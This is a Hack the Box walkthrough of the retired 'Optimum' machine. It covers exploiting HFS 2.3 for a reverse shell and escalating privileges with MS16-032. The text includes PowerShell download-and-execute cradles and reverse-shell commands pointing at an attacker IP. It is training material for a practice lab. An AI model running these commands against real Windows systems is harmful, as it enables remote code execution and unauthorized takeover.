Hack the Box (HTB) machines walkthrough series – Optimum
Today we will be continuing with our Hack the Box (HTB) machine series. This article contains the walkthrough of another HTB machine, this one named “Optimum.”
HTB is an excellent platform that hosts machines belonging to multiple OSes. It offers multiple types of challenges as well. The individual can download the VPN pack to connect to the machines hosted on the HTB platform and has to solve the puzzle (simple enumeration plus pentest) in order to log into the platform.
Note: Only writeups of retired HTB machines are allowed. The machine in this article, Optimum, is retired.
Let’s start with this machine.
1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.
2. The Optimum machine IP is 10.10.10.8.
3. We will adopt the same methodology of performing penetration testing as we have used previously. Let’s start with enumeration in order to gain as much information on the machine as possible.
4. Below is the nmap scan output. As we can see, we have only port 80 open and the service exposed is HFS 2.3. [CLICK IMAGES TO ENLARGE]
<<nmap -sC -sV -oA optimum 10.10.10.8>>
5. For the HFS service there is a known exploit, listed here.
6. Let’s look into the exploit a bit more before running it. As we can see below, the remote code execution violation happens in the search parameter by appending %00 to the command.
7. In the exploit, the author has shown how to exploit the vulnerability, upload nc.exe from the attacking machine and get the shell back.
8. To help make it clear, below is the decoded format of that request.
9. The script also needs to be edited to include the attacking machine IP and port.
ip_addr=<attacking machine ip>
10. After that, let’s copy Kali Linux shipped in Windows nc binary to our working directory.
<<cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum>>
11. And raise a Python http server to host it.
<<python -m simpleHTTPServer 80>>
12. Also set up a listener on port 1234 to get the shell back on the attacking machine.
<<nc -nlvp 1234>>
13. Execute the script like below.
<<Python 39161.py 10.10.10.8 80>>
14. We got the shell at user level.
15. Browse to get the user text flag.
16. Let’s start the enumeration process again to escalate the privileges to the admin/system level.
17. Let’s use a new and very useful utility known as windows-exploit-suggester.py (found here)
18. This tool works by evaluating the current system info with known KB articles and flag the CVEs for missing KBs.
- Let’s start by updating the database locally.
<<python windows-exploit-suggester.py –update>>
- Then, on the system shell, generate the system profile with the systeminfo command. Copy that text as a file locally on the attacking box
- Run the below command to evaluate the current system profile.
<<python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls>>
19. We can see that there are several missing CVEs on this system. The one that we will target is MS16-032.
20. We can use Metasploit directly here, but we can also use PowerShell to escalate on this system as well.
21. Under PowerShell/Empire, there is a separate ps1 file for MS16-032. We will save it as Empire.ps1.
22. Opening this file, we can see that the usage is like below.
23. Adding the same to the end of the file:
Invoke-MS16032 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://10.10.14.2/shell.ps1‘)”
24. What is shell.ps1 above? Shell.ps1 is another PowerShell reverse TCP shell from Nishang repo. See below: Invoke-PowerShellTCP.ps1.C
25. On the victim system we will download the MS16-032 ps1 file, which will escalate the privileges and give the shell back through shell.ps1.
26. We need to change shell.ps1 and make it point back to our attacking system.
<<Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4321>>
27. Before we execute, let’s open the listener on our machine to listen for the shell.
<<nc -nlvp 4321>>
28. On the victim side, download Empire.ps1 with the below session, which will inherently download shell.ps1. We should get a shell back.
<< powershell IEX(New-Object Net.WebClient).downloadString(‘http://<attacking machine>/Empire.ps1’>>
29. But we did not get the session. I tried multiple times and even reverted the box, but it was not working. There were no tokens generated and hence no handles were captured.
30. After multiple tries, I discovered the issue. The system we are targeting is 64-bit and the user level shell that we have is 32-bit, because we uploaded the 32-bit nc.exe onto the system. So we need to access the 64-bit System32 folder, but instead we were routed to SysWOW64. To make sure we use the 64-bit System32 folder PowerShell binary, we need to use Sysnative, which will help redirect the request from a 32-bit application to System32 instead of SysWOW64.
31. Quickly testing this, I pulled a Burp suite session and sent the request to Repeater. Since we know that the parameter to exploit is search with %00, we followed the original exploit, except this time we use PowerShell instead of vbs. As you can see below, I have mentioned the Sysnative directory which should do the routing. Please note that this will give us a new user 64-bit session.
32. Open the listener and execute the payload. We get the session.
<<nc -nlvp 4321>>
33. Now just replicate the steps above with a new reverse shell file (newshell.ps1) to listen back on 4444.
34. Open the listener on 4444 this time and execute the payload, and we exploit the vuln and get the handle.
<<nc -nlvp 4444>>
35. Just navigate to the Administrator directory to get the root.txt.
This was really a fun box, as one needs to understand the exploit instead of blindly exploiting it and then must make sure that the escalation path goes in the correct 64-bit shell.
We will continue this series with more such interesting machines.